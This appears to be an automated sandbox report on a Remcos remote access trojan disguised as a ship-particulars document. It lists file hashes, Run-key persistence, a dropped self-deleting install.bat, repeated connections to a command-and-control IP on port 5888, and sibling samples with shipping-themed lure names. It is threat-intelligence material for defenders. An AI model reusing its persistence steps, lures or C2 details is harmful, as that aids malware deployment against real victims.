http://www.fonts.com | MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmp | false | | high
http://www.sandoll.co.kr | MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.com | MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown

                              Contacted IPs


                              Public

IP | Domain | Country | ASN | ASN Name | Malicious
185.244.26.244 | unknown | Netherlands | 47158 | VAMU-ASIP-TRANSITVAMURU | true

                              Private

                              IP
                              127.0.0.1

                              General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 422673
Start date: 24.05.2021
Start time: 13:18:44
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 52s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: MV OLYMPIC PROGRESS VSL PARTICULARS.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 40
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@21/6@0/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 3.6% (good quality ratio 2.6%)
• Quality average: 54.2%
• Quality standard deviation: 40.8%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 254
• Number of non-executed functions: 125
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

Time | Type | Description
13:20:14 | API Interceptor | 1x Sleep call for process: MV OLYMPIC PROGRESS VSL PARTICULARS.exe modified
13:20:19 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run remcos "C:\Users\user\AppData\Roaming\remcos\svchosts.exe"
13:20:27 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run remcos "C:\Users\user\AppData\Roaming\remcos\svchosts.exe"
13:20:56 | API Interceptor | 329x Sleep call for process: svchosts.exe modified

                              Joe Sandbox View / Context

                              IPs

Match | Associated Sample Name / URL | Detection
185.244.26.244 | MASTERS INSTRUCTIONS.exe | malicious
185.244.26.244 | MV OLYMPIC PROGRESS PDA ORDER.exe | malicious
185.244.26.244 | MV OLYMPIC PROGRESS vessel particulars.exe | malicious
185.244.26.244 | MT PEGAS ANGENCY INSTRUCTIONS.exe | malicious
185.244.26.244 | MV GENCO RESOLUTE VOY 1.exe | malicious

                                        Domains

                                        No context

                                        ASN

Match | Associated Sample Name / URL | Detection | Context (IP)
VAMU-ASIP-TRANSITVAMURU | MASTERS INSTRUCTIONS.exe | malicious | 185.244.26.244
VAMU-ASIP-TRANSITVAMURU | MV OLYMPIC PROGRESS PDA ORDER.exe | malicious | 185.244.26.244
VAMU-ASIP-TRANSITVAMURU | MV OLYMPIC PROGRESS vessel particulars.exe | malicious | 185.244.26.244
VAMU-ASIP-TRANSITVAMURU | MT PEGAS ANGENCY INSTRUCTIONS.exe | malicious | 185.244.26.244
VAMU-ASIP-TRANSITVAMURU | NEW ORDER.exe | malicious | 185.244.26.200
VAMU-ASIP-TRANSITVAMURU | Passport_ID_jpg.jar | malicious | 185.244.26.214
VAMU-ASIP-TRANSITVAMURU | MV GENCO RESOLUTE VOY 1.exe | malicious | 185.244.26.244
VAMU-ASIP-TRANSITVAMURU | Quotation ATB-PR28500KINH.exe | malicious | 185.244.26.200
VAMU-ASIP-TRANSITVAMURU | CU3e1CWzlr.exe | malicious | 185.244.26.250
VAMU-ASIP-TRANSITVAMURU | odW62S0306.exe | malicious | 185.244.26.204
VAMU-ASIP-TRANSITVAMURU | ORDEN.exe | malicious | 185.244.26.196
VAMU-ASIP-TRANSITVAMURU | sB2ppXd9nd1DsMC.exe | malicious | 185.244.26.241
VAMU-ASIP-TRANSITVAMURU | 2CBPOfVTs5QeG8Z.exe | malicious | 185.244.26.208
VAMU-ASIP-TRANSITVAMURU | i5TiYkAYkWJy1O8.exe | malicious | 185.244.26.208
VAMU-ASIP-TRANSITVAMURU | NEW ORDERS.exe | malicious | 185.244.26.227
VAMU-ASIP-TRANSITVAMURU | DHL STATEMENT OF ACCOUNT.exe | malicious | 185.244.26.194
VAMU-ASIP-TRANSITVAMURU | DHLMT-BL-PL-CI08348-SHIPMENT.pdf.xls.exe | malicious | 185.244.26.221
VAMU-ASIP-TRANSITVAMURU | sf_express_waybill_parcelArrival.docx.exe | malicious | 185.244.26.221
VAMU-ASIP-TRANSITVAMURU | COVID-19 CDC Secon Outbreak Warning release.exe | malicious | 185.244.26.221
VAMU-ASIP-TRANSITVAMURU | Kaszfnrcg7.exe | malicious | 185.244.26.213

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MV OLYMPIC PROGRESS VSL PARTICULARS.exe.log
                                        Process:C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1216
                                        Entropy (8bit):5.355304211458859
                                        Encrypted:false
                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                        MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                        SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                        SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                        SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                        Malicious:true
                                        Reputation:high, very likely benign file
                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\svchosts.exe.log
                                        Process:C:\Users\user\AppData\Roaming\remcos\svchosts.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1216
                                        Entropy (8bit):5.355304211458859
                                        Encrypted:false
                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                        MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                        SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                        SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                        SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                        C:\Users\user\AppData\Local\Temp\install.bat
                                        Process:C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):101
                                        Entropy (8bit):4.955940042858344
                                        Encrypted:false
                                        SSDEEP:3:cQxCvfn9m1WXp5cViEaKC5QIgUGNK0dAIvBkwbM2n:cQ2fE1WXp+NaZ5QnUaKkAIvKwo2n
                                        MD5:C6528F472FA5CE7856BF410C209D67F7
                                        SHA1:37CA0E9867AC88F730591EFAAE207694E83D0942
                                        SHA-256:E43C7CDC0D9CC9959B625E6634B012CC770DA7B77E8EE38F86B62E64864F4C24
                                        SHA-512:1AF7382CAB009FE23AC7D041B474E4E4F2F1EAD5DEB0ADCF13A6FC63B4A8C63FD6D06F562525E04BA5781FB8119493821062730F4B973D1AF5A161FE6912C4CE
                                        Malicious:false
                                        Reputation:low
                                        Preview: PING 127.0.0.1 -n 2 ..start "" "C:\Users\user\AppData\Roaming\remcos\svchosts.exe"..del %0 ..exit ..
                                        C:\Users\user\AppData\Roaming\remcos\logs.dat
                                        Process:C:\Users\user\AppData\Roaming\remcos\svchosts.exe
                                        File Type:ASCII text, with CRLF, CR line terminators
                                        Category:dropped
                                        Size (bytes):25
                                        Entropy (8bit):3.593269689515108
                                        Encrypted:false
                                        SSDEEP:3:M1XKe3n:0aS
                                        MD5:89B5667E995FBEB88EDDA0BAC2FD47C4
                                        SHA1:76FB3FE1E77B0F1A5C6014437515F1DB8EAAEC37
                                        SHA-256:EE321AE724EA998CADB15526D3573191C892653D28A8AA7DE43413AE2DCE5E79
                                        SHA-512:F542FC946C29FAECC5D660548B43B1F59C909955FDF162F150426DBB23FDD3CDEFED435254884DBCDACA82529249A7C2C07DC9DC8C5073156056F8A92B28A92F
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview: ...[ Program Manager ]...
                                        C:\Users\user\AppData\Roaming\remcos\svchosts.exe
                                        Process:C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):723968
                                        Entropy (8bit):7.755016164218812
                                        Encrypted:false
                                        SSDEEP:12288:DRRwaxEm8nYqQnds1lbcJDp/Hvvi/MIPvTbXI0AqGsR2EcZofPVCtd7:7yTnYqtTcBRHvnIH3r617
                                        MD5:6FB384AF6E5FD9D345650E37B1B58098
                                        SHA1:D4094353B97C47F35057A343049E854DDC01D90D
                                        SHA-256:FC08A11AA7B0C98831ECBFFF1742A3099466919E12CE8169639EC1CDEFB5E2C3
                                        SHA-512:8458B4509AC5636F4BA6E8CB6DE12DB222278DD83E3B63EB193E6067522F91E7AA5FA7C7EE2F0778338A33C9A746432C28557A5D6469BC90A22CED3AEC13CC87
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Metadefender, Detection: 40%
                                        • Antivirus: ReversingLabs, Detection: 86%
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............0.............. ... ...@....@.. ....................................@.................................H ..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H............6...............3.................................................?.......................................?.......................................?.......................................?.0..........*....0...........(.....*.0...........(.....*.0..H........(.... L#.. .?..a%..^E................+... }uVJZ ry..a+....}......}....*.0..N........ ..,. ..).a%..^E............'.......+%.{...... G..Z .G_.a+.. f..~Z c.J.a+..*...0..;........ .. .'4.a%..^E................+..
                                        C:\Users\user\AppData\Roaming\remcos\svchosts.exe:Zone.Identifier
                                        Process:C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview: [ZoneTransfer]....ZoneId=0

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.755016164218812
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        • DOS Executable Generic (2002/1) 0.01%
                                        File name:MV OLYMPIC PROGRESS VSL PARTICULARS.exe
File size:723968 bytes
                                        MD5:6fb384af6e5fd9d345650e37b1b58098
                                        SHA1:d4094353b97c47f35057a343049e854ddc01d90d
                                        SHA256:fc08a11aa7b0c98831ecbfff1742a3099466919e12ce8169639ec1cdefb5e2c3
                                        SHA512:8458b4509ac5636f4ba6e8cb6de12db222278dd83e3b63eb193e6067522f91e7aa5fa7c7ee2f0778338a33c9a746432c28557a5d6469bc90a22ced3aec13cc87
                                        SSDEEP:12288:DRRwaxEm8nYqQnds1lbcJDp/Hvvi/MIPvTbXI0AqGsR2EcZofPVCtd7:7yTnYqtTcBRHvnIH3r617
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............0.............. ... ...@....@.. ....................................@................................

                                        File Icon

                                        Icon Hash:00828e8e8686b000

                                        Static PE Info

                                        General

                                        Entrypoint:0x4b209e
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                        Time Stamp:0x60A281F6 [Mon May 17 14:47:18 2021 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:v4.0.30319
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                        Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
(the "add byte ptr [eax], al" line is repeated 97 times in the preview: the bytes after the jmp are zero-filled, and the two-byte sequence 00 00 disassembles to this instruction)

                                        Data Directories

Name                                   Virtual Address   Virtual Size   Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT           0x0               0x0
IMAGE_DIRECTORY_ENTRY_IMPORT           0xb2048           0x53           .text
IMAGE_DIRECTORY_ENTRY_RESOURCE         0xb4000           0x5f0          .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION        0x0               0x0
IMAGE_DIRECTORY_ENTRY_SECURITY         0x0               0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC        0xb6000           0xc            .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG            0x0               0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT        0x0               0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR        0x0               0x0
IMAGE_DIRECTORY_ENTRY_TLS              0x0               0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG      0x0               0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT     0x0               0x0
IMAGE_DIRECTORY_ENTRY_IAT              0x2000            0x8            .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT     0x0               0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR   0x2008            0x48           .text
IMAGE_DIRECTORY_ENTRY_RESERVED         0x0               0x0

                                        Sections

Name     Virtual Address   Virtual Size   Raw Size   Xored PE   ZLIB Complexity   File Type   Entropy          Characteristics
.text    0x2000            0xb00a4        0xb0200    False      0.854182376686    data        7.76293714446    IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc    0xb4000           0x5f0          0x600      False      0.432942708333    data        4.22058360528    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc   0xb6000           0xc            0x200      False      0.044921875       data        0.101910425663   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

Name          RVA       Size    Type                                                                              Language   Country
RT_VERSION    0xb40a0   0x364   data
RT_MANIFEST   0xb4404   0x1ea   XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                        Imports

DLL           Import
mscoree.dll   _CorExeMain

                                        Version Infos

Description        Data
Translation        0x0000 0x04b0
LegalCopyright     Volkswagen
Assembly Version   4.0.0.0
InternalName       DnUSdBB.exe
FileVersion        4.0.0.0
CompanyName        Volkswagen
LegalTrademarks
Comments           2014 Volkswagen Golf
ProductName        ExceptionDispatch
ProductVersion     4.0.0.0
FileDescription    ExceptionDispatch
OriginalFilename   DnUSdBB.exe

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

Timestamp                              Source Port   Dest Port   Source IP        Dest IP
May 24, 2021 13:20:59.062856913 CEST   49739         5888        192.168.2.3      185.244.26.244
May 24, 2021 13:20:59.141930103 CEST   5888          49739       185.244.26.244   192.168.2.3
May 24, 2021 13:20:59.723535061 CEST   49739         5888        192.168.2.3      185.244.26.244
May 24, 2021 13:20:59.801363945 CEST   5888          49739       185.244.26.244   192.168.2.3
May 24, 2021 13:21:00.426567078 CEST   49739         5888        192.168.2.3      185.244.26.244
May 24, 2021 13:21:00.504420996 CEST   5888          49739       185.244.26.244   192.168.2.3
May 24, 2021 13:21:05.522675037 CEST   49745         5888        192.168.2.3      185.244.26.244
May 24, 2021 13:21:05.600676060 CEST   5888          49745       185.244.26.244   192.168.2.3
May 24, 2021 13:21:06.239612103 CEST   49745         5888        192.168.2.3      185.244.26.244
May 24, 2021 13:21:06.317636967 CEST   5888          49745       185.244.26.244   192.168.2.3
May 24, 2021 13:21:06.927124977 CEST   49745         5888        192.168.2.3      185.244.26.244
May 24, 2021 13:21:07.005256891 CEST   5888          49745       185.244.26.244   192.168.2.3
May 24, 2021 13:21:12.022463083 CEST   49746         5888        192.168.2.3      185.244.26.244
May 24, 2021 13:21:12.100657940 CEST   5888          49746       185.244.26.244   192.168.2.3
May 24, 2021 13:21:12.615124941 CEST   49746         5888        192.168.2.3      185.244.26.244
May 24, 2021 13:21:12.694560051 CEST   5888          49746       185.244.26.244   192.168.2.3
May 24, 2021 13:21:13.208923101 CEST   49746         5888        192.168.2.3      185.244.26.244
May 24, 2021 13:21:13.289000034 CEST   5888          49746       185.244.26.244   192.168.2.3
May 24, 2021 13:21:18.304776907 CEST   49747         5888        192.168.2.3      185.244.26.244
May 24, 2021 13:21:18.383306026 CEST   5888          49747       185.244.26.244   192.168.2.3
May 24, 2021 13:21:18.898077965 CEST   49747         5888        192.168.2.3      185.244.26.244
May 24, 2021 13:21:18.975924015 CEST   5888          49747       185.244.26.244   192.168.2.3
May 24, 2021 13:21:19.490652084 CEST   49747         5888        192.168.2.3      185.244.26.244
May 24, 2021 13:21:19.569814920 CEST   5888          49747       185.244.26.244   192.168.2.3
May 24, 2021 13:21:24.586220026 CEST   49748         5888        192.168.2.3      185.244.26.244
May 24, 2021 13:21:24.665337086 CEST   5888          49748       185.244.26.244   192.168.2.3
May 24, 2021 13:21:25.178669930 CEST   49748         5888        192.168.2.3      185.244.26.244
May 24, 2021 13:21:25.256413937 CEST   5888          49748       185.244.26.244   192.168.2.3
May 24, 2021 13:21:25.756905079 CEST   49748         5888        192.168.2.3      185.244.26.244
May 24, 2021 13:21:25.835342884 CEST   5888          49748       185.244.26.244   192.168.2.3
May 24, 2021 13:21:30.852503061 CEST   49750         5888        192.168.2.3      185.244.26.244
May 24, 2021 13:21:30.930550098 CEST   5888          49750       185.244.26.244   192.168.2.3
May 24, 2021 13:21:31.444899082 CEST   49750         5888        192.168.2.3      185.244.26.244
May 24, 2021 13:21:31.524775028 CEST   5888          49750       185.244.26.244   192.168.2.3
May 24, 2021 13:21:32.038938046 CEST   49750         5888        192.168.2.3      185.244.26.244
May 24, 2021 13:21:32.117052078 CEST   5888          49750       185.244.26.244   192.168.2.3
May 24, 2021 13:21:37.133511066 CEST   49751         5888        192.168.2.3      185.244.26.244
May 24, 2021 13:21:37.211464882 CEST   5888          49751       185.244.26.244   192.168.2.3
May 24, 2021 13:21:37.726586103 CEST   49751         5888        192.168.2.3      185.244.26.244
May 24, 2021 13:21:37.804537058 CEST   5888          49751       185.244.26.244   192.168.2.3
May 24, 2021 13:21:38.304760933 CEST   49751         5888        192.168.2.3      185.244.26.244
May 24, 2021 13:21:38.384146929 CEST   5888          49751       185.244.26.244   192.168.2.3
May 24, 2021 13:21:43.639974117 CEST   49752         5888        192.168.2.3      185.244.26.244
May 24, 2021 13:21:43.719818115 CEST   5888          49752       185.244.26.244   192.168.2.3
May 24, 2021 13:21:44.227169991 CEST   49752         5888        192.168.2.3      185.244.26.244
May 24, 2021 13:21:44.305042982 CEST   5888          49752       185.244.26.244   192.168.2.3
May 24, 2021 13:21:44.805685997 CEST   49752         5888        192.168.2.3      185.244.26.244
May 24, 2021 13:21:44.883714914 CEST   5888          49752       185.244.26.244   192.168.2.3
May 24, 2021 13:21:49.900419950 CEST   49753         5888        192.168.2.3      185.244.26.244
May 24, 2021 13:21:49.978168011 CEST   5888          49753       185.244.26.244   192.168.2.3
May 24, 2021 13:21:50.493761063 CEST   49753         5888        192.168.2.3      185.244.26.244
May 24, 2021 13:21:50.571635008 CEST   5888          49753       185.244.26.244   192.168.2.3
May 24, 2021 13:21:51.087145090 CEST   49753         5888        192.168.2.3      185.244.26.244
May 24, 2021 13:21:51.164854050 CEST   5888          49753       185.244.26.244   192.168.2.3
May 24, 2021 13:21:56.166234970 CEST   49754         5888        192.168.2.3      185.244.26.244

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Behavior

                                        System Behavior

                                        General

                                        Start time:13:19:33
                                        Start date:24/05/2021
                                        Path:C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe'
                                        Imagebase:0x350000
                                        File size:723968 bytes
                                        MD5 hash:6FB384AF6E5FD9D345650E37B1B58098
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.296655049.000000000271B000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.296655049.000000000271B000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.298701013.00000000038BF000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Remcos, Description: detect Remcos in memory, Source: 00000000.00000002.298701013.00000000038BF000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        General

                                        Start time:13:20:14
                                        Start date:24/05/2021
                                        Path:C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe
                                        Wow64 process (32bit):true
                                        Commandline:{path}
                                        Imagebase:0xf90000
                                        File size:723968 bytes
                                        MD5 hash:6FB384AF6E5FD9D345650E37B1B58098
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Remcos_1, Description: Remcos Payload, Source: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                        • Rule: Remcos, Description: detect Remcos in memory, Source: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                        Reputation:low

                                        General

                                        Start time:13:20:17
                                        Start date:24/05/2021
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\install.bat' '
                                        Imagebase:0xef0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:13:20:18
                                        Start date:24/05/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6b2800000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:13:20:18
                                        Start date:24/05/2021
                                        Path:C:\Windows\SysWOW64\PING.EXE
                                        Wow64 process (32bit):true
                                        Commandline:PING 127.0.0.1 -n 2
                                        Imagebase:0xc30000
                                        File size:18944 bytes
